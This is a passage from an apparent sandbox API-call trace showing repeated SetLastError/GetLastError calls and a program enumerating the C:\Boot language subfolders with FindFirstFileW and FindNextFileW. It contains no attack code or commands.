[0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.389] SetLastError (dwErrCode=0x12) [0065.389] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.390] SetLastError (dwErrCode=0x12) [0065.390] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.391] SetLastError (dwErrCode=0x12) [0065.391] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.392] GetLastError () returned 0x12 [0065.392] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.393] GetLastError () returned 0x12 [0065.393] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.394] GetLastError () returned 0x12 [0065.394] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.395] GetLastError () returned 0x12 [0065.395] SetLastError (dwErrCode=0x12) [0065.396] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.397] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.397] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.410] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.411] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.411] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.411] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.411] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.411] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.411] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.411] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.412] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.412] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.412] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.412] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.412] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.412] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.412] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.413] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.413] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.413] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.413] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.413] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.413] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.413] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.413] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.413] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.413] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.414] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.414] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.414] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.414] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.414] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.414] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.414] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.415] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.415] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.415] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.416] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.416] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.416] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.416] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.416] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.416] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.416] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.416] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.416] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.416] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.417] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.417] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.417] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.417] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.417] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.417] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.436] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.436] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.436] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.437] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.437] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.437] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.437] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.437] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.437] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.438] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.438] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.438] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.438] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.438] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.438] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.439] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.439] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.439] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.439] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.439] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.439] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.439] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.439] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.439] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.440] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.440] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.440] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.441] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.441] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.441] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.441] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.441] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.441] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.441] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.441] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.441] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.442] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.442] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.442] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.443] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.443] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.443] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.443] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.443] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.443] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.443] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.443] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.443] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.444] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.444] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.444] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.445] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.445] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.445] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.445] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.445] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.445] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.446] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.446] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.446] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.446] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.446] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.446] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.447] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.447] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.447] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.447] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.447] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.447] FindNextFileW (in: hFindFile=0x2ed828, lpFindFileData=0x2c6f37c | out: lpFindFileData=0x2c6f37c) returned 1 [0065.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0x2f3170 [0065.448] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.448] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 1 [0065.448] FindNextFileW (in: hFindFile=0x2f3170, lpFindFileData=0x2c6f0f8 | out: lpFindFileData=0x2c6f0f8) returned 0 [0065.448] FindClose (in: hFindFile=0x2f3170 | out: hFindFile=0x2f3170) returned 1 [0065.448] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x3300050 | out: hHeap=0x8c0000) returned 1 [0065.448] FindNextFileW (in: 